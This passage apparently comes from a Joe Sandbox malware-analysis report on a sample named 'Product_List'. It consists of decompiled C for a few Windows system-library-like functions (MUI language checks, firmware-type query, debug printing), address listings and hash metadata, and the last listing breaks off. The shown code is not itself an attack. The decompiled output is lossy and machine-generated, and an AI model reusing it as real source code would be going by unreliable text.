                                                      0x01773e7a
                                                      0x01773e7f
                                                      0x01773e8c
                                                      0x01773e8c
                                                      0x01773e91
                                                      0x00000000
                                                      0x01773e91

                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 01773D8C
                                                      • Kernel-MUI-Language-SKU, xrefs: 01773F70
                                                      • WindowsExcludedProcs, xrefs: 01773D6F
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01773E97
                                                      • Kernel-MUI-Language-Allowed, xrefs: 01773DC0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 1a3eabb1bb1d0fa5fec9df89a54af7044a46e1ac6135b6a2cc0745cbb01b6902
                                                      • Instruction ID: 3e88bc23c674ea5e468f8e465d5ebbd5bca6f6a85b851fb81fb13760b87ad291
                                                      • Opcode Fuzzy Hash: 1a3eabb1bb1d0fa5fec9df89a54af7044a46e1ac6135b6a2cc0745cbb01b6902
                                                      • Instruction Fuzzy Hash: ABF14A72D00619EFCF12DF98C984AEEFBB9FF58650F15016AE506A7210E7749E01DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0182E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0182E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0182BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0182BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							L0182AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(L017A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0182A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0182A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(L017A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0182A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0182A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01782280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0177B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									L0177FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01787D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									L0181FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x0182e547
                                                      0x0182e549
                                                      0x0182e54f
                                                      0x0182e553
                                                      0x0182e557
                                                      0x0182e55a
                                                      0x0182e55c
                                                      0x0182e55f
                                                      0x0182e561
                                                      0x0182e567
                                                      0x0182e56b
                                                      0x0182e7e2
                                                      0x00000000
                                                      0x0182e571
                                                      0x0182e575
                                                      0x0182e577
                                                      0x0182e57b
                                                      0x0182e57c
                                                      0x0182e57d
                                                      0x0182e57e
                                                      0x0182e57f
                                                      0x0182e588
                                                      0x0182e58f
                                                      0x0182e591
                                                      0x0182e592
                                                      0x0182e592
                                                      0x0182e596
                                                      0x0182e59e
                                                      0x0182e5a0
                                                      0x0182e5a6
                                                      0x0182e61d
                                                      0x0182e61d
                                                      0x0182e621
                                                      0x0182e623
                                                      0x0182e630
                                                      0x0182e630
                                                      0x0182e7e6
                                                      0x0182e7eb
                                                      0x0182e7ed
                                                      0x0182e7f4
                                                      0x0182e7fa
                                                      0x0182e7ff
                                                      0x0182e7ff
                                                      0x0182e80a
                                                      0x0182e812
                                                      0x0182e812
                                                      0x0182e5ab
                                                      0x0182e5b4
                                                      0x0182e5b9
                                                      0x0182e5be
                                                      0x0182e5c0
                                                      0x0182e5c2
                                                      0x0182e5c8
                                                      0x0182e5c9
                                                      0x0182e5cb
                                                      0x0182e5cc
                                                      0x0182e5d5
                                                      0x0182e5e4
                                                      0x0182e5f1
                                                      0x0182e5f8
                                                      0x0182e5f8
                                                      0x0182e5d5
                                                      0x0182e602
                                                      0x0182e616
                                                      0x0182e63d
                                                      0x0182e644
                                                      0x0182e64d
                                                      0x0182e652
                                                      0x0182e657
                                                      0x0182e659
                                                      0x0182e65b
                                                      0x0182e661
                                                      0x0182e662
                                                      0x0182e664
                                                      0x0182e665
                                                      0x0182e66e
                                                      0x0182e67d
                                                      0x0182e68a
                                                      0x0182e691
                                                      0x0182e691
                                                      0x0182e66e
                                                      0x0182e6b0
                                                      0x00000000
                                                      0x0182e6b6
                                                      0x0182e6bd
                                                      0x0182e6c7
                                                      0x0182e6d7
                                                      0x0182e6d9
                                                      0x0182e6db
                                                      0x0182e6de
                                                      0x0182e6e3
                                                      0x0182e6f3
                                                      0x0182e6fc
                                                      0x0182e700
                                                      0x0182e700
                                                      0x0182e704
                                                      0x0182e70a
                                                      0x0182e70a
                                                      0x0182e713
                                                      0x0182e716
                                                      0x0182e719
                                                      0x0182e720
                                                      0x0182e761
                                                      0x0182e76b
                                                      0x0182e774
                                                      0x0182e77a
                                                      0x0182e77a
                                                      0x0182e78a
                                                      0x0182e791
                                                      0x0182e799
                                                      0x0182e79b
                                                      0x0182e79f
                                                      0x0182e7aa
                                                      0x0182e7c0
                                                      0x0182e7ac
                                                      0x0182e7b2
                                                      0x0182e7b9
                                                      0x0182e7b9
                                                      0x0182e7c7
                                                      0x0182e806
                                                      0x00000000
                                                      0x0182e7c9
                                                      0x0182e7d1
                                                      0x0182e7d8
                                                      0x00000000
                                                      0x0182e7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x0182e722
                                                      0x0182e72e
                                                      0x0182e748
                                                      0x0182e74c
                                                      0x0182e754
                                                      0x0182e756
                                                      0x0182e75c
                                                      0x0182e75c
                                                      0x00000000
                                                      0x0182e75c
                                                      0x0182e758
                                                      0x0182e758
                                                      0x00000000
                                                      0x0182e758
                                                      0x0182e750
                                                      0x00000000
                                                      0x00000000
                                                      0x0182e752
                                                      0x00000000
                                                      0x0182e752
                                                      0x0182e730
                                                      0x0182e735
                                                      0x0182e73d
                                                      0x0182e73f
                                                      0x00000000
                                                      0x00000000
                                                      0x0182e741
                                                      0x0182e741
                                                      0x00000000
                                                      0x0182e741
                                                      0x0182e739
                                                      0x00000000
                                                      0x00000000
                                                      0x0182e73b
                                                      0x00000000
                                                      0x0182e73b
                                                      0x0182e722
                                                      0x0182e720
                                                      0x0182e6b0
                                                      0x0182e618
                                                      0x00000000
                                                      0x0182e618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: bf347c4f3a11a8a39a51608b3921e6e34e41193dd9963a13012bca6e35eba936
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: B291C2312043529FE726CE29C940B17BBE5FF84714F14892DFA95CB280E774EA44CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E017E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18405f0);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E017E53CA(0);
						return E017BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = L01783690(1, _t117, 0x1741810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01784620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E017E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x017e51be
                                                      0x017e51c3
                                                      0x017e51c8
                                                      0x017e51cd
                                                      0x017e51d0
                                                      0x017e51d3
                                                      0x017e51d8
                                                      0x017e51db
                                                      0x017e51de
                                                      0x017e51e0
                                                      0x017e51e3
                                                      0x017e51e6
                                                      0x017e51e8
                                                      0x017e5342
                                                      0x017e5351
                                                      0x017e5356
                                                      0x017e535a
                                                      0x017e5360
                                                      0x017e5363
                                                      0x017e5366
                                                      0x017e5369
                                                      0x017e5369
                                                      0x017e536b
                                                      0x017e536b
                                                      0x017e5370
                                                      0x017e53a3
                                                      0x017e53a4
                                                      0x017e53a6
                                                      0x017e53ab
                                                      0x017e53ab
                                                      0x017e53ae
                                                      0x017e53ae
                                                      0x017e53b5
                                                      0x017e53bf
                                                      0x017e53bf
                                                      0x017e5375
                                                      0x017e5396
                                                      0x017e53a0
                                                      0x017e53a0
                                                      0x00000000
                                                      0x017e5396
                                                      0x017e5377
                                                      0x017e5379
                                                      0x017e537f
                                                      0x017e538c
                                                      0x017e5390
                                                      0x00000000
                                                      0x017e5390
                                                      0x017e51ee
                                                      0x017e51f1
                                                      0x017e5301
                                                      0x017e5310
                                                      0x017e5315
                                                      0x017e5318
                                                      0x017e531b
                                                      0x017e5320
                                                      0x017e532e
                                                      0x017e5331
                                                      0x00000000
                                                      0x017e5331
                                                      0x017e5328
                                                      0x017e5329
                                                      0x00000000
                                                      0x017e5329
                                                      0x017e51fa
                                                      0x017e5235
                                                      0x017e5236
                                                      0x017e5239
                                                      0x017e523f
                                                      0x017e5240
                                                      0x017e5241
                                                      0x017e5242
                                                      0x017e5246
                                                      0x017e5247
                                                      0x017e524e
                                                      0x017e5251
                                                      0x017e5267
                                                      0x017e5269
                                                      0x017e526e
                                                      0x017e527d
                                                      0x017e527e
                                                      0x017e5281
                                                      0x017e5282
                                                      0x017e5287
                                                      0x017e5288
                                                      0x017e528a
                                                      0x017e528f
                                                      0x017e5294
                                                      0x00000000
                                                      0x00000000
                                                      0x017e529a
                                                      0x017e529c
                                                      0x017e529e
                                                      0x017e529e
                                                      0x017e52a4
                                                      0x017e52b0
                                                      0x00000000
                                                      0x00000000
                                                      0x017e52ba
                                                      0x017e52bc
                                                      0x017e52bc
                                                      0x017e52d4
                                                      0x017e52d9
                                                      0x017e52dc
                                                      0x017e52e1
                                                      0x00000000
                                                      0x00000000
                                                      0x017e52e7
                                                      0x017e52f4
                                                      0x00000000
                                                      0x017e52f4
                                                      0x017e5270
                                                      0x00000000
                                                      0x017e5270
                                                      0x017e51fc
                                                      0x017e51fd
                                                      0x017e5202
                                                      0x017e5203
                                                      0x017e5205
                                                      0x017e520a
                                                      0x017e520f
                                                      0x00000000
                                                      0x00000000
                                                      0x017e521b
                                                      0x017e5226
                                                      0x017e522b
                                                      0x017e521d
                                                      0x017e521d
                                                      0x017e5222
                                                      0x017e5222
                                                      0x017e522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: d70816aa8b46643f571dc24db835703aa063cd87260033fc27fabe7ec12f7d22
                                                      • Instruction ID: 1d8ed04f2e2b37474e3e38a76ac520c20ff84530b9aae7bd91101bbadf3f9ea8
                                                      • Opcode Fuzzy Hash: d70816aa8b46643f571dc24db835703aa063cd87260033fc27fabe7ec12f7d22
                                                      • Instruction Fuzzy Hash: DA517CB5A046099FDB25DFA8C898BAEFBF8FF48708F14406DE609EB251D7709900CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0176B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x183f7a8);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E017BD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017AD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017AF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L017BDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017AB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L017AB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017AA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                      0x0176b171
                                                      0x0176b171
                                                      0x0176b171
                                                      0x0176b171
                                                      0x0176b171
                                                      0x0176b176
                                                      0x0176b17b
                                                      0x0176b180
                                                      0x0176b186
                                                      0x0176b18f
                                                      0x0176b198
                                                      0x0176b1a4
                                                      0x0176b1aa
                                                      0x017c4802
                                                      0x017c4802
                                                      0x017c4805
                                                      0x017c480c
                                                      0x017c480e
                                                      0x0176b1d1
                                                      0x0176b1d3
                                                      0x0176b1de
                                                      0x0176b1de
                                                      0x017c4817
                                                      0x017c481e
                                                      0x017c4820
                                                      0x017c4822
                                                      0x017c4822
                                                      0x017c4824
                                                      0x017c4824
                                                      0x017c482a
                                                      0x00000000
                                                      0x00000000
                                                      0x017c4835
                                                      0x017c483a
                                                      0x017c483d
                                                      0x017c483f
                                                      0x017c4842
                                                      0x017c4842
                                                      0x017c4842
                                                      0x017c4846
                                                      0x017c484c
                                                      0x017c484e
                                                      0x017c4851
                                                      0x017c4851
                                                      0x017c4853
                                                      0x017c4854
                                                      0x017c4854
                                                      0x017c4858
                                                      0x017c485a
                                                      0x017c485a
                                                      0x017c485d
                                                      0x017c485f
                                                      0x017c4861
                                                      0x017c4861
                                                      0x017c4866
                                                      0x017c486b
                                                      0x017c486e
                                                      0x017c4871
                                                      0x017c4876
                                                      0x017c4876
                                                      0x017c4878
                                                      0x017c487b
                                                      0x017c4884
                                                      0x017c4884
                                                      0x00000000
                                                      0x017c487d
                                                      0x017c487d
                                                      0x017c4882
                                                      0x017c4889
                                                      0x017c4889
                                                      0x017c488f
                                                      0x017c4891
                                                      0x017c48e0
                                                      0x017c48e2
                                                      0x017c48e4
                                                      0x017c48e4
                                                      0x017c48e7
                                                      0x017c48e7
                                                      0x017c48ed
                                                      0x017c48f4
                                                      0x017c48f6
                                                      0x017c4951
                                                      0x017c4951
                                                      0x017c4953
                                                      0x017c4953
                                                      0x017c4956
                                                      0x017c4956
                                                      0x017c4958
                                                      0x017c4959
                                                      0x017c4959
                                                      0x017c495d
                                                      0x017c495d
                                                      0x017c495f
                                                      0x017c495f
                                                      0x017c4965
                                                      0x017c4969
                                                      0x017c49ba
                                                      0x017c49ba
                                                      0x017c49c1
                                                      0x017c49c5
                                                      0x017c49cc
                                                      0x017c49d4
                                                      0x017c49d7
                                                      0x017c49da
                                                      0x017c49e4
                                                      0x017c49e5
                                                      0x017c49f3
